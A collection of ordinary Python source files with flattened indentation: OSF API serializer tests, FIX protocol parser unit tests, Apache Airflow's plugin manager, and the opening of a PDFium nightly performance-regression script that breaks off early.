# We need a Serializer to test the Relationship field (needs context)
class BasicNodeSerializer(JSONAPISerializer):
parent = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<_id>'}
)
parent_with_meta = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<_id>'},
related_meta={'count': 'get_count', 'extra': 'get_extra'},
)
self_and_related_field = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<_id>'},
self_view='nodes:node-contributors',
self_view_kwargs={'node_id': '<_id>'},
)
two_url_kwargs = RelationshipField(
# fake url, for testing purposes
related_view='nodes:node-pointer-detail',
related_view_kwargs={'node_id': '<_id>', 'node_link_id': '<_id>'},
)
# If related_view_kwargs is a callable, this field _must_ match the property name on
# the target record
registered_from = RelationshipField(
related_view=lambda n: 'registrations:registration-detail' if n and n.is_registration else 'nodes:node-detail',
related_view_kwargs=lambda n: {'node_id': '<registered_from._id>'})
field_with_filters = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<_id>'},
filter={'target': 'hello', 'woop': 'yea'}
)
class Meta:
type_ = 'nodes'
def get_count(self, obj):
return 1
def get_extra(self, obj):
return 'foo'
# TODO: Expand tests
# Regression test for https://openscience.atlassian.net/browse/OSF-4832
def test_serializing_meta(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
meta = data['relationships']['parent_with_meta']['links']['related']['meta']
assert_not_in('count', meta)
assert_in('extra', meta)
assert_equal(meta['extra'], 'foo')
def test_serializing_empty_to_one(self):
req = make_drf_request_with_version(version='2.2')
node = factories.NodeFactory()
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
# This node is not registered_from another node hence it is an empty-to-one.
assert 'registered_from' not in data['relationships']
# In 2.9, API returns null for empty relationships
# https://openscience.atlassian.net/browse/PLAT-840
req = make_drf_request_with_version(version='2.9')
node = factories.NodeFactory()
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
assert data['relationships']['registered_from']['data'] is None
def test_self_and_related_fields(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
relationship_field = data['relationships']['self_and_related_field']['links']
assert_in(
'/v2/nodes/{}/contributors/'.format(node._id),
relationship_field['self']['href']
)
assert_in(
'/v2/nodes/{}/'.format(node._id),
relationship_field['related']['href']
)
def test_field_with_two_kwargs(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
field = data['relationships']['two_url_kwargs']['links']
assert_in(
'/v2/nodes/{}/node_links/{}/'.format(node._id, node._id),
field['related']['href']
)
def test_field_with_two_filters(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
field = data['relationships']['field_with_filters']['links']
assert_in(
urllib.quote('filter[target]=hello', safe='?='),
field['related']['href']
)
assert_in(
urllib.quote('filter[woop]=yea', safe='?='),
field['related']['href']
)
def test_field_with_callable_related_attrs(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
assert_not_in('registered_from', data['relationships'])
registration = factories.RegistrationFactory(project=node)
data = self.BasicNodeSerializer(
registration, context={
'request': req}
).data['data']
field = data['relationships']['registered_from']['links']
assert_in('/v2/nodes/{}/'.format(node._id), field['related']['href'])
class TestShowIfVersion(ApiTestCase):
def setUp(self):
super(TestShowIfVersion, self).setUp()
self.node = factories.NodeFactory()
self.registration = factories.RegistrationFactory()
def test_node_links_allowed_version_node_serializer(self):
req = make_drf_request_with_version(version='2.0')
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_in('node_links', data['relationships'])
def test_node_links_bad_version_node_serializer(self):
req = make_drf_request_with_version(version='2.1')
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_not_in('node_links', data['relationships'])
def test_node_links_allowed_version_registration_serializer(self):
req = make_drf_request_with_version(version='2.0')
data = RegistrationSerializer(
self.registration,
context={'request': req}
).data['data']
assert_in('node_links', data['attributes'])
def test_node_links_bad_version_registration_serializer(self):
req = make_drf_request_with_version(version='2.1')
data = RegistrationSerializer(
self.registration,
context={'request': req}
).data['data']
assert_not_in('node_links', data['attributes'])
class VersionedDateTimeField(DbTestCase):
def setUp(self):
super(VersionedDateTimeField, self).setUp()
self.node = factories.NodeFactory()
self.old_date = datetime.utcnow() # naive dates before django-osf
self.old_date_without_microseconds = self.old_date.replace(
microsecond=0)
self.new_date = datetime.utcnow().replace(
tzinfo=utc) # non-naive after django-osf
self.new_date_without_microseconds = self.new_date.replace(
microsecond=0)
self.old_format = '%Y-%m-%dT%H:%M:%S.%f'
self.old_format_without_microseconds = '%Y-%m-%dT%H:%M:%S'
self.new_format = '%Y-%m-%dT%H:%M:%S.%fZ'
def test_old_date_formats_to_old_format(self):
req = make_drf_request_with_version(version='2.0')
setattr(self.node, 'last_logged', self.old_date)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(self.old_date,self.old_format),
data['attributes']['date_modified']
)
def test_old_date_without_microseconds_formats_to_old_format(self):
req = make_drf_request_with_version(version='2.0')
setattr(self.node, 'last_logged', self.old_date_without_microseconds)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(
self.old_date_without_microseconds,
self.old_format_without_microseconds
),
data['attributes']['date_modified']
)
def test_old_date_formats_to_new_format(self):
req = make_drf_request_with_version(version='2.2')
setattr(self.node, 'last_logged', self.old_date)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(self.old_date,self.new_format),
data['attributes']['date_modified']
)
def test_old_date_without_microseconds_formats_to_new_format(self):
req = make_drf_request_with_version(version='2.2')
setattr(self.node, 'last_logged', self.old_date_without_microseconds)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(
self.old_date_without_microseconds,
self.new_format
),
data['attributes']['date_modified']
)
def test_new_date_formats_to_old_format(self):
req = make_drf_request_with_version(version='2.0')
setattr(self.node, 'last_logged', self.new_date)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(self.new_date, self.old_format),
data['attributes']['date_modified']
)
def test_new_date_without_microseconds_formats_to_old_format(self):
req = make_drf_request_with_version(version='2.0')
setattr(self.node, 'last_logged', self.new_date_without_microseconds)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(
self.new_date_without_microseconds,
self.old_format_without_microseconds
),
data['attributes']['date_modified']
)
def test_new_date_formats_to_new_format(self):
req = make_drf_request_with_version(version='2.2')
setattr(self.node, 'last_logged', self.new_date)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(self.new_date, self.new_format),
data['attributes']['date_modified']
)
def test_new_date_without_microseconds_formats_to_new_format(self):
req = make_drf_request_with_version(version='2.2')
setattr(self.node, 'last_logged', self.new_date_without_microseconds)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(
self.new_date_without_microseconds,
self.new_format
),
data['attributes']['date_modified']
)
|
|
""" fix.parser unit tests
Copyright (c) 2014 Kenn Takara
See LICENSE for details
"""
import unittest
from fixtest.fix.parser import FIXParser
from fixtest.fix.parser import FIXParserError, FIXLengthTooLongError
from fixtest.tests.utils import to_fix
# pylint: disable=too-many-public-methods
# pylint: disable=missing-docstring
class MockFIXReceiver(object):
def __init__(self):
self.count = 0
self.last_received_message = None
self.last_error = None
def on_message_received(self, message, message_length, checksum):
# pylint: disable=unused-argument
self.count += 1
self.last_received_message = message
def on_error_received(self, error):
# pylint: disable=no-self-use
raise error
class TestFIXParserInternals(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestFIXParserInternals, self).__init__(*args, **kwargs)
self.receiver = None
def setUp(self):
self.receiver = MockFIXReceiver()
def test_parse_field(self):
""" Basic _parse_field function test """
parser = FIXParser(self.receiver)
field = parser._parse_field('8=a')
self.assertEquals(8, field[0])
self.assertEquals('a', field[1])
def test_parse_field_bad_input(self):
""" Test bad _parse_field inputs """
parser = FIXParser(self.receiver)
# missing '='
with self.assertRaises(FIXParserError):
parser._parse_field('abcde')
# bad tag id
with self.assertRaises(FIXParserError):
parser._parse_field('a=a')
# missing tag id
with self.assertRaises(FIXParserError):
parser._parse_field('=a')
# bad tag id
with self.assertRaises(FIXParserError):
parser._parse_field('10b=a')
class TestFIXParser(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestFIXParser, self).__init__(*args, **kwargs)
self.receiver = None
def setUp(self):
self.receiver = MockFIXReceiver()
def test_simple_message(self):
""" Basic function test. """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
self.assertFalse(parser.is_parsing)
# message taken from wikipedia article
parser.on_data_received(to_fix('8=FIX.4.2',
'9=65',
'35=A',
'49=SERVER',
'56=CLIENT',
'34=177',
'52=20090107-18:15:16',
'98=0',
'108=30',
'10=062'))
self.assertFalse(parser.is_parsing)
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(10, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '65'),
(35, 'A'),
(10, '062')]))
def test_message_starts_incorrectly(self):
""" Message must start with tag 8 """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
# message does not start with tag 8
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('18=FIX.4.2',
'9=32',
'8=FIX.4.2',
'35=A',
'10=100'))
# unexpected tag 8
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'8=abcdef',
'35=A',
'10=100'))
def test_partial_message(self):
""" Test for partial input. """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
self.assertFalse(parser.is_parsing)
self.assertEquals(0, self.receiver.count)
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'35=A'))
self.assertEquals(0, self.receiver.count)
self.assertTrue(parser.is_parsing)
def test_bad_syntax(self):
""" Test for various bad syntax cases """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
# Tag ID is not a number
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'abcd=A'))
# Missing '=' and value portion
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4',
'9=32',
'35'))
# Missing tag ID portion
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4',
'9=32',
'=A'))
def test_message_too_large(self):
""" Test for too long message """
parser = FIXParser(self.receiver,
header_fields=[8, 9],
max_length=100)
with self.assertRaises(FIXLengthTooLongError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'42=A' + 'BB'*100))
def test_message_bad_binary_length(self):
""" Test for message with missing binary data """
parser = FIXParser(self.receiver,
header_fields=[8, 9],
binary_fields=[1000],
max_length=100)
# length too short
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'42=A',
'1000=2',
'1001=abababababab',
'10=000'))
# length too long
# This will not raise an error
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'42=A',
'1000=20',
'1001=ab',
'10=000'))
self.assertEquals(0, self.receiver.count)
self.assertTrue(parser.is_parsing)
# Note that we could have an error where the length of the
# binary field is longer than the message. In this case, the
# operation should time out, but that is not the responsibility of
# the parser.
def test_message_binary_too_long(self):
""" Test for message with missing binary data """
parser = FIXParser(self.receiver,
header_fields=[8, 9],
binary_fields=[1000],
max_length=100)
# length too short
with self.assertRaises(FIXLengthTooLongError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'42=A',
'1000=128',
'1001=abababababab',
'10=000'))
def test_parser_reset(self):
""" Test that the parser resets on an error """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
# Tag ID is not a number
self.assertFalse(parser.is_parsing)
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'abcd=A'))
self.assertFalse(parser.is_parsing)
def test_bad_binary_fields(self):
""" Test bad binary fields """
parser = FIXParser(self.receiver,
binary_fields=[1000],
header_fields=[8, 9])
# Missing binary value portion of binary field
# BUGBUG: This can cause some problems, because the parser
# does not attempt to validate until the entire
# field has been read in. Which this will fail because
# the length goes past the end of the message.
# For now, live with this.
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'1000=5',
'999=11',
'10=001'))
# Missing binary length portion (the only time this
# really impacts something is if the field has an
# embedded \x01).
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'1001=1010\x011010',
'10=001'))
parser.on_data_received(to_fix('8=FIX.4.2',
'9=14',
'1001=10101010',
'10=127'))
self.assertIsNone(self.receiver.last_error)
self.assertEquals(1, self.receiver.count)
self.assertIsNotNone(self.receiver.last_received_message)
def test_header_fields(self):
""" Header field testing. """
parser = FIXParser(self.receiver,
header_fields=[8, 9, 320])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=5',
'35=A',
'10=178'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
message[320] = 'hello there'
self.assertEquals(5, len(message))
# verify the order of the message
items = [(k, v) for k, v in message.items()]
self.assertEquals(8, items[0][0])
self.assertEquals(9, items[1][0])
self.assertEquals(320, items[2][0])
def test_binary_fields(self):
""" Binary field testing. """
parser = FIXParser(self.receiver,
binary_fields=[1000, 1010],
header_fields=[8, 9])
# Test with embedded binary \x01
parser.on_data_received(to_fix('8=FIX.4.2',
'9=18',
'1000=5',
'1001=\x01\x02\x03\x04\x05',
'10=066'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(5, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '18'),
(1000, '5'),
(1001, '\x01\x02\x03\x04\x05'),
(10, '066')]))
# Test with embedded '=' signs
parser.on_data_received(to_fix('8=FIX.4.2',
'9=18',
'1000=5',
'1001=31=20',
'10=054'))
self.assertEquals(2, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(5, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '18'),
(1000, '5'),
(1001, '31=20'),
(10, '054')]))
def test_simple_group_fields(self):
""" Simple group field testing. """
parser = FIXParser(self.receiver,
group_fields={100: [101, 102, 200],
200: [201, 202], },
header_fields=[8, 9])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=18',
'100=1',
'101=a',
'102=b',
'10=099'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(4, len(message))
self.assertTrue(100 in message)
self.assertEquals(1, len(message[100]))
group = message[100]
self.assertIsNotNone(group)
self.assertEquals(1, len(group))
self.assertEquals(2, len(group[0]))
self.assertTrue(101 in group[0])
self.assertTrue(102 in group[0])
self.assertEquals('a', group[0][101])
self.assertEquals('b', group[0][102])
def test_multiple_groups(self):
""" Test the receiving of multiple groups """
parser = FIXParser(self.receiver,
group_fields={100: [101, 102, 200],
200: [201, 202], },
header_fields=[8, 9])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'100=2',
'101=a',
'102=b',
'101=aa',
'102=bb',
'10=135'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(4, len(message))
self.assertTrue(100 in message)
self.assertEquals(2, len(message[100]))
group = message[100]
self.assertIsNotNone(group)
self.assertEquals(2, len(group))
self.assertEquals(2, len(group[0]))
self.assertTrue(101 in group[0])
self.assertTrue(102 in group[0])
self.assertEquals('a', group[0][101])
self.assertEquals('b', group[0][102])
self.assertEquals(2, len(group[1]))
self.assertTrue(101 in group[1])
self.assertTrue(102 in group[1])
self.assertEquals('aa', group[1][101])
self.assertEquals('bb', group[1][102])
def test_nested_groups(self):
""" Test the receiving of nested groups """
parser = FIXParser(self.receiver,
debug=True,
group_fields={100: [101, 102, 200],
200: [201, 202], },
header_fields=[8, 9])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=40',
'100=1',
'101=a',
'102=b',
'200=1',
'201=abc',
'202=def',
'10=087'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(4, len(message))
self.assertTrue(100 in message)
self.assertEquals(1, len(message[100]))
group = message[100]
self.assertIsNotNone(group)
self.assertEquals(1, len(group))
self.assertEquals(3, len(group[0]))
self.assertTrue(101 in group[0])
self.assertTrue(102 in group[0])
self.assertTrue(200 in group[0])
self.assertEquals('a', group[0][101])
self.assertEquals('b', group[0][102])
subgroup = group[0]
self.assertIsNotNone(subgroup)
self.assertEquals(3, len(subgroup))
self.assertEquals(1, len(subgroup[200]))
subgroup200 = subgroup[200]
self.assertEquals(2, len(subgroup200[0]))
self.assertTrue(201 in subgroup200[0])
self.assertTrue(202 in subgroup200[0])
self.assertEquals('abc', subgroup200[0][201])
self.assertEquals('def', subgroup200[0][202])
def test_multiple_message(self):
""" Receive two messages in one data buffer """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
self.assertFalse(parser.is_parsing)
parser.on_data_received(to_fix('8=FIX.4.2',
'9=5',
'35=A',
'10=178',
'8=FIX.4.2',
'9=17',
'35=E',
'99=forsooth',
'10=013'))
self.assertFalse(parser.is_parsing)
self.assertEquals(2, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(5, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '17'),
(35, 'E'),
(99, 'forsooth'),
(10, '013')]))
def test_one_byte_at_a_time(self):
""" Receive a message split up into single bytes """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
text = to_fix('8=FIX.4.2',
'9=23',
'35=A',
'919=this',
'955=that',
'10=013')
for c in text:
parser.on_data_received(c)
self.assertFalse(parser.is_parsing)
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(6, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '23'),
(35, 'A'),
(919, 'this'),
(955, 'that'),
(10, '013')]))
def test_partial_binary_data(self):
""" Receive a piece of binary data split into two parts """
parser = FIXParser(self.receiver,
binary_fields=[99],
header_fields=[8, 9])
text = to_fix('8=FIX.4.2',
'9=38',
'35=A') + '99=5\x01100=12'
text2 = to_fix('345',
'919=this',
'955=that',
'10=198')
parser.on_data_received(text)
self.assertTrue(parser.is_parsing)
parser.on_data_received(text2)
self.assertFalse(parser.is_parsing)
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(8, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '38'),
(35, 'A'),
(99, '5'),
(100, '12345'),
(919, 'this'),
(955, 'that'),
(10, '198')]))
def test_grouped_binary_fields(self):
""" Test binary fields that are in a group. """
parser = FIXParser(self.receiver,
debug=True,
group_fields={200: [201, 202, 99, 100]},
binary_fields=[99],
header_fields=[8, 9])
text = to_fix('8=FIX.4.2',
'9=80',
'35=A',
'200=2',
'201=aabc',
'99=5',
'100=abcde',
'201=zzzaa',
'202=myname',
'99=5',
'100=zztop',
'955=that',
'10=201')
parser.on_data_received(text)
self.assertFalse(parser.is_parsing)
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(6, len(message))
self.assertEquals(2, len(message[200]))
self.assertTrue(200 in message)
self.assertTrue(955 in message)
subgroup = message[200][0]
self.assertEquals(3, len(subgroup))
self.assertTrue(201 in subgroup)
self.assertTrue(99 in subgroup)
self.assertTrue(100 in subgroup)
subgroup = message[200][1]
self.assertEquals(4, len(subgroup))
self.assertTrue(201 in subgroup)
self.assertTrue(202 in subgroup)
self.assertTrue(99 in subgroup)
self.assertTrue(100 in subgroup)
def test_multiple_nested_groups(self):
""" Test the receiving of multiple nested groups """
parser = FIXParser(self.receiver,
debug=True,
group_fields={100: [101, 102, 200],
200: [201, 202], },
header_fields=[8, 9])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=60',
'100=2',
'101=a',
'102=b',
'200=2',
'201=abc',
'202=def',
'201=zzz',
'101=c',
'102=d',
'10=002'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
print message.store
self.assertIsNotNone(message)
self.assertEquals(4, len(message))
self.assertTrue(100 in message)
self.assertEquals(2, len(message[100]))
group = message[100]
self.assertIsNotNone(group)
self.assertEquals(2, len(group))
self.assertEquals(3, len(group[0]))
self.assertTrue(101 in group[0])
self.assertTrue(102 in group[0])
self.assertTrue(200 in group[0])
self.assertEquals('a', group[0][101])
self.assertEquals('b', group[0][102])
self.assertEquals(2, len(group[1]))
self.assertTrue(101 in group[1])
self.assertTrue(102 in group[1])
self.assertTrue(200 not in group[1])
self.assertEquals('c', group[1][101])
self.assertEquals('d', group[1][102])
subgroup = group[0]
self.assertIsNotNone(subgroup)
self.assertEquals(3, len(subgroup))
self.assertEquals(2, len(subgroup[200]))
subgroup200 = subgroup[200]
self.assertEquals(2, len(subgroup200[0]))
self.assertTrue(201 in subgroup200[0])
self.assertTrue(202 in subgroup200[0])
self.assertEquals('abc', subgroup200[0][201])
self.assertEquals('def', subgroup200[0][202])
self.assertEquals(1, len(subgroup200[1]))
self.assertTrue(201 in subgroup200[1])
self.assertTrue(202 not in subgroup200[1])
self.assertEquals('zzz', subgroup200[1][201])
|
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import object
import imp
import inspect
import os
import re
from typing import Any, Dict, List, Set, Type
import pkg_resources
from airflow import settings
from airflow.models.baseoperator import BaseOperatorLink
from airflow.utils.log.logging_mixin import LoggingMixin
log = LoggingMixin().log
import_errors = {}
class AirflowPluginException(Exception):
pass
class AirflowPlugin(object):
name = None # type: str
operators = [] # type: List[Any]
sensors = [] # type: List[Any]
hooks = [] # type: List[Any]
executors = [] # type: List[Any]
macros = [] # type: List[Any]
admin_views = [] # type: List[Any]
flask_blueprints = [] # type: List[Any]
menu_links = [] # type: List[Any]
appbuilder_views = [] # type: List[Any]
appbuilder_menu_items = [] # type: List[Any]
# A list of global operator extra links that can redirect users to
# external systems. These extra links will be available on the
# task page in the form of buttons.
#
# Note: the global operator extra link can be overridden at each
# operator level.
global_operator_extra_links = [] # type: List[BaseOperatorLink]
# A list of operator extra links to override or add operator links
# to existing Airflow Operators.
# These extra links will be available on the task page in form of
# buttons.
operator_extra_links = [] # type: List[BaseOperatorLink]
@classmethod
def validate(cls):
if not cls.name:
raise AirflowPluginException("Your plugin needs a name.")
@classmethod
def on_load(cls, *args, **kwargs):
"""
Executed when the plugin is loaded.
This method is only called once during runtime.
:param args: If future arguments are passed in on call.
:param kwargs: If future arguments are passed in on call.
"""
def load_entrypoint_plugins(entry_points, airflow_plugins):
"""
Load AirflowPlugin subclasses from the entrypoints
provided. The entry_point group should be 'airflow.plugins'.
:param entry_points: A collection of entrypoints to search for plugins
:type entry_points: Generator[setuptools.EntryPoint, None, None]
:param airflow_plugins: A collection of existing airflow plugins to
ensure we don't load duplicates
:type airflow_plugins: list[type[airflow.plugins_manager.AirflowPlugin]]
:rtype: list[airflow.plugins_manager.AirflowPlugin]
"""
for entry_point in entry_points:
log.debug('Importing entry_point plugin %s', entry_point.name)
plugin_obj = entry_point.load()
if is_valid_plugin(plugin_obj, airflow_plugins):
if callable(getattr(plugin_obj, 'on_load', None)):
plugin_obj.on_load()
airflow_plugins.append(plugin_obj)
return airflow_plugins
def register_inbuilt_operator_links():
"""
Register all the Operators Links that are already defined for the operators
in the "airflow" project. Example: QDSLink (Operator Link for Qubole Operator)
This is required to populate the "whitelist" of allowed classes when deserializing operator links
"""
inbuilt_operator_links = set() # type: Set[Type]
try:
from airflow.contrib.operators.bigquery_operator import BigQueryConsoleLink, BigQueryConsoleIndexableLink # noqa E501 # pylint: disable=R0401,line-too-long
inbuilt_operator_links.update([BigQueryConsoleLink, BigQueryConsoleIndexableLink])
except ImportError:
pass
try:
from airflow.contrib.operators.qubole_operator import QDSLink # pylint: disable=R0401
inbuilt_operator_links.update([QDSLink])
except ImportError:
pass
registered_operator_link_classes.update({
"{}.{}".format(link.__module__, link.__name__): link
for link in inbuilt_operator_links
})
def is_valid_plugin(plugin_obj, existing_plugins):
"""
Check whether a potential object is a subclass of
the AirflowPlugin class.
:param plugin_obj: potential subclass of AirflowPlugin
:param existing_plugins: Existing list of AirflowPlugin subclasses
:return: Whether or not the obj is a valid subclass of
AirflowPlugin
"""
if (
inspect.isclass(plugin_obj) and
issubclass(plugin_obj, AirflowPlugin) and
(plugin_obj is not AirflowPlugin)
):
plugin_obj.validate()
return plugin_obj not in existing_plugins
return False
plugins = [] # type: List[AirflowPlugin]
norm_pattern = re.compile(r'[/|.]')
if settings.PLUGINS_FOLDER is None:
raise AirflowPluginException("Plugins folder is not set")
# Crawl through the plugins folder to find AirflowPlugin derivatives
for root, dirs, files in os.walk(settings.PLUGINS_FOLDER, followlinks=True):
for f in files:
try:
filepath = os.path.join(root, f)
if not os.path.isfile(filepath):
continue
mod_name, file_ext = os.path.splitext(
os.path.split(filepath)[-1])
if file_ext != '.py':
continue
log.debug('Importing plugin module %s', filepath)
# normalize root path as namespace
namespace = '_'.join([re.sub(norm_pattern, '__', root), mod_name])
m = imp.load_source(namespace, filepath)
for obj in list(m.__dict__.values()):
if is_valid_plugin(obj, plugins):
plugins.append(obj)
except Exception as e:
log.exception(e)
log.error('Failed to import plugin %s', filepath)
import_errors[filepath] = str(e)
plugins = load_entrypoint_plugins(
pkg_resources.iter_entry_points('airflow.plugins'),
plugins
)
def make_module(name, objects):
log.debug('Creating module %s', name)
name = name.lower()
module = imp.new_module(name)
module._name = name.split('.')[-1]
module._objects = objects
module.__dict__.update((o.__name__, o) for o in objects)
return module
# Plugin components to integrate as modules
operators_modules = []
sensors_modules = []
hooks_modules = []
executors_modules = []
macros_modules = []
# Plugin components to integrate directly
admin_views = [] # type: List[Any]
flask_blueprints = [] # type: List[Any]
menu_links = [] # type: List[Any]
flask_appbuilder_views = [] # type: List[Any]
flask_appbuilder_menu_links = [] # type: List[Any]
global_operator_extra_links = [] # type: List[BaseOperatorLink]
operator_extra_links = [] # type: List[BaseOperatorLink]
registered_operator_link_classes = {} # type: Dict[str, Type]
"""Mapping of class names to class of OperatorLinks registered by plugins.
Used by the DAG serialization code to only allow specific classes to be created
during deserialization
"""
for p in plugins:
operators_modules.append(
make_module('airflow.operators.' + p.name, p.operators + p.sensors))
sensors_modules.append(
make_module('airflow.sensors.' + p.name, p.sensors)
)
hooks_modules.append(make_module('airflow.hooks.' + p.name, p.hooks))
executors_modules.append(
make_module('airflow.executors.' + p.name, p.executors))
macros_modules.append(make_module('airflow.macros.' + p.name, p.macros))
admin_views.extend(p.admin_views)
menu_links.extend(p.menu_links)
flask_appbuilder_views.extend(p.appbuilder_views)
flask_appbuilder_menu_links.extend(p.appbuilder_menu_items)
flask_blueprints.extend([{
'name': p.name,
'blueprint': bp
} for bp in p.flask_blueprints])
global_operator_extra_links.extend(p.global_operator_extra_links)
operator_extra_links.extend([ope for ope in p.operator_extra_links])
registered_operator_link_classes.update({
"{}.{}".format(link.__class__.__module__,
link.__class__.__name__): link.__class__
for link in p.operator_extra_links
})
|
|
#!/usr/bin/env python
# Copyright 2017 The PDFium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Looks for performance regressions on all pushes since the last run.
Run this nightly to have a periodical check for performance regressions.
Stores the results for each run and last checkpoint in a results directory.
"""
import argparse
import datetime
import json
import os
import sys
# pylint: disable=relative-import
from common import PrintWithTime
from common import RunCommandPropagateErr
from githelper import GitHelper
from safetynet_conclusions import PrintConclusionsDictHumanReadable
class JobContext(object):
"""Context for a single run, including name and directory paths."""
def __init__(self, args):
self.datetime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
self.results_dir = args.results_dir
self.last_revision_covered_file = os.path.join(self.results_dir,
'last_revision_covered')
self.run_output_dir = os.path.join(self.results_dir,
'profiles_%s' % self.datetime)
self.run_output_log_file = os.path.join(self.results_dir,
'%s.log' % self.datetime)
class JobRun(object):
"""A single run looking for regressions since the last one."""
def __init__(self, args, context):
"""Constructor.
Args:
args: Namespace with arguments passed to the script.
context: JobContext for this run.
"""
self.git = GitHelper()
self.args = args
self.context = context
def Run(self):
"""Searches for regressions.
Will only write a checkpoint when first run, and on all subsequent runs
a comparison is done against the last checkpoint.
Returns:
Exit code for the script: 0 if no significant changes are found; 1 if
there was an error in the comparison; 3 if there was a regression; 4 if
there was an improvement and no regression.
"""
